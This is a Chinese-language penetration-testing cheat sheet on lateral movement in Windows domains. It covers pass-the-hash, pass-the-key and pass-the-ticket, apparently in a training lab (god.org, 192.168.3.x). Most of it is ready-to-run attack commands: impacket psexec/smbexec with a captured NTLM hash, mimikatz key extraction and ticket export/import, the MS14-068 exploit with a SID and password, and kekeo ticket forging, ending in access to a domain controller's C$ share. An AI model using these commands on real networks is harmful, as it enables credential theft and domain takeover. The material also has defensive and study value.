横向移动ptt-ptk-pth
PTH
PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。
如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击,
总结:KB2871997补丁后的影响
pth:没打补丁用户都可以连接,打了补丁只能administrator连接
ptk:打了补丁才能用户都可以连接,采用aes256连接
PTH = Pass The Hash,通过密码散列值 (通常是NTLM Hash)来进行攻击。
在域环境中,用户登录计算机时使用的域账号,计算机会用相同本地管理员账号和密码。因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。另外注意在Window Server 2012 R2之前使用到的密码散列值是LM、NTLM,在2012 R2及其版本之后使用到的密码散列值是NTLM Hash。
impacket
psexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
PTK
PTK = Pass The Key,当系统安装了KB2871997补丁且禁用了NTLM的时候,
那我们抓取到的ntlm hash也就失去了作用,但是可以通过PTK的攻击方式获得权限。
mimikatz sekurlsa::ekeys
mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值
https://www.freebuf.com/column/220740.html
PTT
1、漏洞-MS14068(webadmin权限)-利用漏洞生成的用户的新身份票据尝试认证
MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。
它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC。
该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。
用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证.
获取sid
上传利用工具
shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45
伪造票据
清除以前的票据
导入票据
mimikatz kerberos::ptc TGT_webadmin@god.org.ccache
访问域控
kekeo(高权限,需NTLM)
利用获取的NTLM生成新的票据尝试认证
因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,
我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗
生成票据
shell kekeo "tgt::ask /user:Administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7" "exit"
导入票据:
shell kekeo "kerberos::ptt TGT_Administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi" "exit"
查看票据:
shell klist
利用票据连接:
shell dir \\owa2010cn-god\c$
mimikatz
利用历史遗留的票据重新认证尝试
导出票据:
mimikatz sekurlsa::tickets /export
导入票据:
mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;22d3a]-2-1-40e00000-Administrator@krbtgt-god.org.kirbi
查看票据:shell klist
利用票据连接:shell dir \owa2010cn-god\c$
注意:成功不成功看当前主机有没有被目标连接过